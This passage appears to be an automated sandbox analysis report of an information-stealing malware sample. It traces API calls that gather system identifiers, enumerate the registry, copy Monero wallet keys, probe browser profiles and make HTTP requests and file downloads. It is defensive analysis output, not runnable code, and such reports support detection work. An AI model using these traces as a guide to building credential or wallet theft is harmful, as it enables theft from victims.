                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA10), ref: 02A0134E
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA14), ref: 02A0135C
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA18), ref: 02A0136A
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A3AA1C), ref: 02A01378
                                                                                                                                                                                • Part of subcall function 02A10C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,02A01385), ref: 02A10C91
                                                                                                                                                                                • Part of subcall function 02A10C85: RtlAllocateHeap.NTDLL(00000000), ref: 02A10C98
                                                                                                                                                                                • Part of subcall function 02A10C85: GetComputerNameA.KERNEL32(00000000,02A01385), ref: 02A10CAC
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02A013E3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$HeapProcess_memset$AllocateComputerExitName
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2891980384-0
                                                                                                                                                                              • Opcode ID: d5b917b9097a9928cd234f920c30982338ee0b088c377f3945afd9cc17fb7520
                                                                                                                                                                              • Instruction ID: 5a2ae9810f4371231af4afe6856d877d89d06a4de115aab7607aa7dc283dfc21
                                                                                                                                                                              • Opcode Fuzzy Hash: d5b917b9097a9928cd234f920c30982338ee0b088c377f3945afd9cc17fb7520
                                                                                                                                                                              • Instruction Fuzzy Hash: AC418FA2E4423866EF21DBB09C99FDA7BACAF15310F5009D1E5C9E3041DF74DA888B90
                                                                                                                                                                              Function 02A11203 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,02A3670F,00000000,?,?), ref: 02A11273
                                                                                                                                                                              • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 02A112B0
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A112DD
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 02A112FC
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 02A11332
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A11347
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,02A36E8C), ref: 02A113DC
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02A11446
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02A11466
                                                                                                                                                                              • RegCloseKey.ADVAPI32(?), ref: 02A11472
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Closelstrcpy$OpenQueryValuelstrlen$Enumlstrcatwsprintf
                                                                                                                                                                              • String ID: - $%s\%s$?
                                                                                                                                                                              • API String ID: 2394436309-3278919252
                                                                                                                                                                              • Opcode ID: c5b70c01e55cb68ce6d612ac079ba52d943a0bd1e1b158d963bb41991b64ff75
                                                                                                                                                                              • Instruction ID: 80de5aea35e04596e98317b0f454f2cbb87713f5d4212ed9742f75a9dac8b59a
                                                                                                                                                                              • Opcode Fuzzy Hash: c5b70c01e55cb68ce6d612ac079ba52d943a0bd1e1b158d963bb41991b64ff75
                                                                                                                                                                              • Instruction Fuzzy Hash: DF61F4B594022CABEB219F14DD84FDAB7B9EB44714F5046E2AA09B2111DF30AFD9CF50
                                                                                                                                                                              Function 02A109A2 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 110memorystringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 02A109D5
                                                                                                                                                                              • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02A10A15
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 02A10A6A
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10A71
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A10AA7
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,02A36E3C), ref: 02A10AB6
                                                                                                                                                                                • Part of subcall function 02A11684: GetCurrentHwProfileA.ADVAPI32(?), ref: 02A1169F
                                                                                                                                                                                • Part of subcall function 02A11684: _memset.LIBCMT ref: 02A116CE
                                                                                                                                                                                • Part of subcall function 02A11684: lstrcat.KERNEL32(?,00000000), ref: 02A116F6
                                                                                                                                                                                • Part of subcall function 02A11684: lstrcat.KERNEL32(?,02A36ECC), ref: 02A11713
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A10ACD
                                                                                                                                                                                • Part of subcall function 02A123D5: malloc.MSVCRT ref: 02A123DA
                                                                                                                                                                                • Part of subcall function 02A123D5: strncpy.MSVCRT ref: 02A123EB
                                                                                                                                                                              • lstrcat.KERNEL32(00000000,00000000), ref: 02A10AF0
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$Heap$AllocateCurrentDirectoryInformationProcessProfileVolumeWindows_memsetlstrcpylstrlenmallocstrncpywsprintf
                                                                                                                                                                              • String ID: :\$C$QuBi
                                                                                                                                                                              • API String ID: 3915896539-239756005
                                                                                                                                                                              • Opcode ID: fcc7bfabf93c52e1aa1c3aa2e3746eb201a480448f42546b5c0141dcb829af9f
                                                                                                                                                                              • Instruction ID: 4f9a927cbc389ea9f2fc20b5a1fc47ff8bf14aa9315e6f3f13fbdd598df7ab7a
                                                                                                                                                                              • Opcode Fuzzy Hash: fcc7bfabf93c52e1aa1c3aa2e3746eb201a480448f42546b5c0141dcb829af9f
                                                                                                                                                                              • Instruction Fuzzy Hash: AD41AC71D84228ABCB259F789D85ADEBABDEF09310F0001E5F509E2110EA308FD58F64
                                                                                                                                                                              Function 02A168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A06963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A069C5
                                                                                                                                                                                • Part of subcall function 02A06963: StrCmpCA.SHLWAPI(?), ref: 02A069DF
                                                                                                                                                                                • Part of subcall function 02A06963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 02A06A0E
                                                                                                                                                                                • Part of subcall function 02A06963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 02A06A4D
                                                                                                                                                                                • Part of subcall function 02A06963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 02A06A7D
                                                                                                                                                                                • Part of subcall function 02A06963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 02A06A88
                                                                                                                                                                                • Part of subcall function 02A06963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 02A06AAC
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 02A1691A
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A16925
                                                                                                                                                                                • Part of subcall function 02A11E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,02A16931,?), ref: 02A11E37
                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,?), ref: 02A1693A
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A16949
                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 02A16962
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
                                                                                                                                                                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                                                                                                                                                                              • API String ID: 4174444224-1526165396
                                                                                                                                                                              • Opcode ID: 87b1277eba69908a4daa475a73c944a8843027920d487211ed260b95781889ca
                                                                                                                                                                              • Instruction ID: f985e27b0c2fa109a85a22a64dc43b5b9a61ed4de5f85caa3ece9e1504bc0211
                                                                                                                                                                              • Opcode Fuzzy Hash: 87b1277eba69908a4daa475a73c944a8843027920d487211ed260b95781889ca
                                                                                                                                                                              • Instruction Fuzzy Hash: FB218C31D80218ABDB21BF74AD899AD77BDAF04B24B044225FD06E3150DF34D9558F95
                                                                                                                                                                              Function 02A0EABC Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 290COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 02A0EAF9
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 02A0EB56
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481,firefox), ref: 02A0EE1D
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 02A0EC33
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 02A0ECE3
                                                                                                                                                                              • StrCmpCA.SHLWAPI(0094C481), ref: 02A0ED40
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy
                                                                                                                                                                              • String ID: Stable\$ Stable\$firefox
                                                                                                                                                                              • API String ID: 3722407311-2697854757
                                                                                                                                                                              • Opcode ID: 2f5c2bfedcf929e3c3583947663ee3588efc318ef910eed4ba7308b0608cea6f
                                                                                                                                                                              • Instruction ID: 9504b6d8126c798b38714b2da1d318150179704b2ec8e6ba962ca6a174d66090
                                                                                                                                                                              • Opcode Fuzzy Hash: 2f5c2bfedcf929e3c3583947663ee3588efc318ef910eed4ba7308b0608cea6f
                                                                                                                                                                              • Instruction Fuzzy Hash: B8B13E32D40219AFDF10FFA8EA86B9D7776BF40324F554510ED05A7280DE30AA699FD1
                                                                                                                                                                              Function 02A01AB8 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 129stringfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A01ADC
                                                                                                                                                                                • Part of subcall function 02A01A51: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 02A01A65
                                                                                                                                                                                • Part of subcall function 02A01A51: RtlAllocateHeap.NTDLL(00000000), ref: 02A01A6C
                                                                                                                                                                                • Part of subcall function 02A01A51: RegOpenKeyExA.KERNEL32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,02A01AE9), ref: 02A01A89
                                                                                                                                                                                • Part of subcall function 02A01A51: RegQueryValueExA.ADVAPI32(02A01AE9,wallet_path,00000000,00000000,00000000,000000FF), ref: 02A01AA4
                                                                                                                                                                                • Part of subcall function 02A01A51: RegCloseKey.ADVAPI32(02A01AE9), ref: 02A01AAD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A01AF1
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A01AFE
                                                                                                                                                                              • lstrcat.KERNEL32(?,.keys), ref: 02A01B19
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • CopyFileA.KERNEL32(?,?,00000001), ref: 02A01C2A
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A07FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A07FC7
                                                                                                                                                                                • Part of subcall function 02A07FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FDE
                                                                                                                                                                                • Part of subcall function 02A07FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,02A0E756,?,?,?), ref: 02A07FF5
                                                                                                                                                                                • Part of subcall function 02A07FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,02A0E756,?,?,?), ref: 02A0800C
                                                                                                                                                                                • Part of subcall function 02A07FAC: CloseHandle.KERNEL32(?,?,?,?,?,02A0E756,?,?,?), ref: 02A08034
                                                                                                                                                                              • DeleteFileA.KERNEL32(?), ref: 02A01C9D
                                                                                                                                                                                • Part of subcall function 02A16E97: CreateThread.KERNEL32(00000000,00000000,02A16DC6,?,00000000,00000000), ref: 02A16F36
                                                                                                                                                                                • Part of subcall function 02A16E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 02A16F3E
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Filelstrcpy$lstrcat$CloseCreateHeaplstrlen$AllocAllocateCopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
                                                                                                                                                                              • String ID: .keys$\Monero\wallet.keys
                                                                                                                                                                              • API String ID: 2164590784-3586502688
                                                                                                                                                                              • Opcode ID: 5315b24f95bd51f9849a008a34bc40c2f972b110c67d88c8d827de0233a899b0
                                                                                                                                                                              • Instruction ID: e5d5e3294c2e9484ddac3801abaa4bf73ccfe3929fcf72499775bae8f23c8f09
                                                                                                                                                                              • Opcode Fuzzy Hash: 5315b24f95bd51f9849a008a34bc40c2f972b110c67d88c8d827de0233a899b0
                                                                                                                                                                              • Instruction Fuzzy Hash: 64510771DD022E9BCF21AB64EE85BDD737AAF04314F5144A1AA09B3150DE30AF998F94
                                                                                                                                                                              Function 02A067ED Relevance: 13.6, APIs: 9, Instructions: 110networkfileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A10519: lstrcpy.KERNEL32(00000000,?), ref: 02A10538
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                                • Part of subcall function 02A04AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                                • Part of subcall function 02A04AB6: lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                                • Part of subcall function 02A04AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                              • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 02A06836
                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 02A06856
                                                                                                                                                                              • InternetOpenUrlA.WININET(?,?,00000000,00000000,-00800100,00000000), ref: 02A06877
                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 02A06892
                                                                                                                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02A068C8
                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 02A068F8
                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 02A06923
                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 02A0692A
                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 02A06936
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
